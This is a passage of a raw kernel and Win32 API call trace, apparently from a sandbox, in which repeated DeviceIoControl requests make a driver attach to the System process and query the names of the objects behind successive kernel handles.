ObQueryNameString (in: Object=0xffffe000693de980, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.706] ObfDereferenceObject (Object=0xffffe000693de980) returned 0x8000 [0256.706] IoCompleteRequest () returned 0x0 [0256.706] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0256.706] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.706] PsAcquireProcessExitSynchronization () returned 0x0 [0256.706] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.706] ObReferenceObjectByHandle (in: Handle=0xffffffff800004b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067eec3a0, HandleInformation=0x0) returned 0x0 [0256.706] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.706] PsReleaseProcessExitSynchronization () returned 0x2 [0256.706] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa6f [0256.706] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.706] ObfDereferenceObject (Object=0xffffe00067eec3a0) returned 0x7f1d [0256.706] IoCompleteRequest () returned 0x0 [0256.706] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0256.706] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.706] PsAcquireProcessExitSynchronization () returned 0x0 [0256.706] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.706] ObReferenceObjectByHandle (in: Handle=0xffffffff800004bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697076c0, HandleInformation=0x0) returned 0x0 [0256.706] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.706] PsReleaseProcessExitSynchronization () returned 0x2 [0256.706] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa6e [0256.706] ObQueryNameString (in: Object=0xffffe000697076c0, ObjectNameInfo=0xffffe0006a6ff7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6ff7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.706] ObfDereferenceObject (Object=0xffffe000697076c0) returned 0x7ffa [0256.706] IoCompleteRequest () returned 0x0 [0256.707] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0256.707] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.707] PsAcquireProcessExitSynchronization () returned 0x0 [0256.707] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.707] ObReferenceObjectByHandle (in: Handle=0xffffffff800004c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069709db0, HandleInformation=0x0) returned 0x0 [0256.707] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.707] PsReleaseProcessExitSynchronization () returned 0x2 [0256.707] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa6d [0256.707] ObQueryNameString (in: Object=0xffffe00069709db0, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.707] ObfDereferenceObject (Object=0xffffe00069709db0) returned 0x7ffd [0256.707] IoCompleteRequest () returned 0x0 [0256.707] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x80, lpOverlapped=0x0) returned 1 [0256.707] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.707] PsAcquireProcessExitSynchronization () returned 0x0 [0256.707] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.707] ObReferenceObjectByHandle (in: Handle=0xffffffff800004d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006970e910, HandleInformation=0x0) returned 0x0 [0256.707] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.707] PsReleaseProcessExitSynchronization () returned 0x2 [0256.707] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa6c [0256.707] ObQueryNameString (in: Object=0xffffe0006970e910, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.707] ObfDereferenceObject (Object=0xffffe0006970e910) returned 0x8000 [0256.707] IoCompleteRequest () returned 0x0 [0256.707] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x70, lpOverlapped=0x0) returned 1 [0256.707] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.707] PsAcquireProcessExitSynchronization () returned 0x0 [0256.707] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.707] ObReferenceObjectByHandle (in: Handle=0xffffffff800004d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069710c20, HandleInformation=0x0) returned 0x0 [0256.707] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.707] PsReleaseProcessExitSynchronization () returned 0x2 [0256.707] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa6b [0256.707] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.707] ObfDereferenceObject (Object=0xffffe00069710c20) returned 0x7f17 [0256.707] IoCompleteRequest () returned 0x0 [0256.707] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0256.707] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.707] PsAcquireProcessExitSynchronization () returned 0x0 [0256.707] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.707] ObReferenceObjectByHandle (in: Handle=0xffffffff800004dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697108e0, HandleInformation=0x0) returned 0x0 [0256.707] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.707] PsReleaseProcessExitSynchronization () returned 0x2 [0256.708] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa6a [0256.708] ObQueryNameString (in: Object=0xffffe000697108e0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.708] ObfDereferenceObject (Object=0xffffe000697108e0) returned 0x7ffa [0256.708] IoCompleteRequest () returned 0x0 [0256.708] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0256.708] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.708] PsAcquireProcessExitSynchronization () returned 0x0 [0256.708] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.708] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069710560, HandleInformation=0x0) returned 0x0 [0256.708] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.708] PsReleaseProcessExitSynchronization () returned 0x2 [0256.708] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa69 [0256.708] ObQueryNameString (in: Object=0xffffe00069710560, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.708] ObfDereferenceObject (Object=0xffffe00069710560) returned 0x7ffd [0256.708] IoCompleteRequest () returned 0x0 [0256.708] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x9c, lpOverlapped=0x0) returned 1 [0256.708] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.708] PsAcquireProcessExitSynchronization () returned 0x0 [0256.708] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.708] ObReferenceObjectByHandle (in: Handle=0xffffffff800004fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b5db0, HandleInformation=0x0) returned 0x0 [0256.708] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.708] PsReleaseProcessExitSynchronization () returned 0x2 [0256.708] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa68 [0256.708] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.708] ObfDereferenceObject (Object=0xffffe000697b5db0) returned 0x7f1b [0256.708] IoCompleteRequest () returned 0x0 [0256.708] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xa6, lpOverlapped=0x0) returned 1 [0256.708] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.708] PsAcquireProcessExitSynchronization () returned 0x0 [0256.708] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.708] ObReferenceObjectByHandle (in: Handle=0xffffffff80000500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b4db0, HandleInformation=0x0) returned 0x0 [0256.708] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.708] PsReleaseProcessExitSynchronization () returned 0x2 [0256.708] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa67 [0256.708] ObQueryNameString (in: Object=0xffffe000697b4db0, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.708] ObfDereferenceObject (Object=0xffffe000697b4db0) returned 0x7ffb [0256.708] IoCompleteRequest () returned 0x0 [0256.709] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xa6, lpOverlapped=0x0) returned 1 [0256.709] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.709] PsAcquireProcessExitSynchronization () returned 0x0 [0256.709] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.709] ObReferenceObjectByHandle (in: Handle=0xffffffff80000504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b1740, HandleInformation=0x0) returned 0x0 [0256.709] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.709] PsReleaseProcessExitSynchronization () returned 0x2 [0256.709] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa66 [0256.709] ObQueryNameString (in: Object=0xffffe000697b1740, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.709] ObfDereferenceObject (Object=0xffffe000697b1740) returned 0x7ffe [0256.709] IoCompleteRequest () returned 0x0 [0256.709] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xf6, lpOverlapped=0x0) returned 1 [0256.709] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.709] PsAcquireProcessExitSynchronization () returned 0x0 [0256.709] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.709] ObReferenceObjectByHandle (in: Handle=0xffffffff8000050c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696aac50, HandleInformation=0x0) returned 0x0 [0256.709] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.709] PsReleaseProcessExitSynchronization () returned 0x2 [0256.709] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa65 [0256.709] ObQueryNameString (in: Object=0xffffe000696aac50, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.709] ObfDereferenceObject (Object=0xffffe000696aac50) returned 0x8000 [0256.709] IoCompleteRequest () returned 0x0 [0256.709] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x140, lpOverlapped=0x0) returned 1 [0256.709] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.709] PsAcquireProcessExitSynchronization () returned 0x0 [0256.709] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.709] ObReferenceObjectByHandle (in: Handle=0xffffffff80000510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069729f20, HandleInformation=0x0) returned 0x0 [0256.709] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.709] PsReleaseProcessExitSynchronization () returned 0x2 [0256.709] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa64 [0256.709] ObQueryNameString (in: Object=0xffffe00069729f20, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.709] ObfDereferenceObject (Object=0xffffe00069729f20) returned 0x8000 [0256.709] IoCompleteRequest () returned 0x0 [0256.710] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x140, lpOverlapped=0x0) returned 1 [0256.710] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.710] PsAcquireProcessExitSynchronization () returned 0x0 [0256.710] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.710] ObReferenceObjectByHandle (in: Handle=0xffffffff80000514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006972dab0, HandleInformation=0x0) returned 0x0 [0256.710] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.710] PsReleaseProcessExitSynchronization () returned 0x2 [0256.710] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa63 [0256.710] ObQueryNameString (in: Object=0xffffe0006972dab0, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.710] ObfDereferenceObject (Object=0xffffe0006972dab0) returned 0x8000 [0256.710] IoCompleteRequest () returned 0x0 [0256.710] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.710] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.710] PsAcquireProcessExitSynchronization () returned 0x0 [0256.710] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.710] ObReferenceObjectByHandle (in: Handle=0xffffffff8000051c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069731090, HandleInformation=0x0) returned 0x0 [0256.710] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.710] PsReleaseProcessExitSynchronization () returned 0x2 [0256.710] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa62 [0256.710] ObQueryNameString (in: Object=0xffffe00069731090, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.710] ObfDereferenceObject (Object=0xffffe00069731090) returned 0x7fff [0256.710] IoCompleteRequest () returned 0x0 [0256.710] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.710] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.710] PsAcquireProcessExitSynchronization () returned 0x0 [0256.710] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.710] ObReferenceObjectByHandle (in: Handle=0xffffffff80000520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069729170, HandleInformation=0x0) returned 0x0 [0256.710] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.710] PsReleaseProcessExitSynchronization () returned 0x2 [0256.710] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa61 [0256.710] ObQueryNameString (in: Object=0xffffe00069729170, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.710] ObfDereferenceObject (Object=0xffffe00069729170) returned 0x8000 [0256.710] IoCompleteRequest () returned 0x0 [0256.710] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0256.710] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.710] PsAcquireProcessExitSynchronization () returned 0x0 [0256.710] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.711] ObReferenceObjectByHandle (in: Handle=0xffffffff80000580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006983af20, HandleInformation=0x0) returned 0x0 [0256.711] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.711] PsReleaseProcessExitSynchronization () returned 0x2 [0256.711] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa60 [0256.711] ObQueryNameString (in: Object=0xffffe0006983af20, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.711] ObfDereferenceObject (Object=0xffffe0006983af20) returned 0x7ffb [0256.711] IoCompleteRequest () returned 0x0 [0256.711] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x70, lpOverlapped=0x0) returned 1 [0256.711] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.711] PsAcquireProcessExitSynchronization () returned 0x0 [0256.711] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.711] ObReferenceObjectByHandle (in: Handle=0xffffffff80000588, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069838dd0, HandleInformation=0x0) returned 0x0 [0256.711] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.711] PsReleaseProcessExitSynchronization () returned 0x2 [0256.711] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa5f [0256.711] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.711] ObfDereferenceObject (Object=0xffffe00069838dd0) returned 0x7f1f [0256.711] IoCompleteRequest () returned 0x0 [0256.711] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0256.711] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.711] PsAcquireProcessExitSynchronization () returned 0x0 [0256.711] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.711] ObReferenceObjectByHandle (in: Handle=0xffffffff80000590, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: 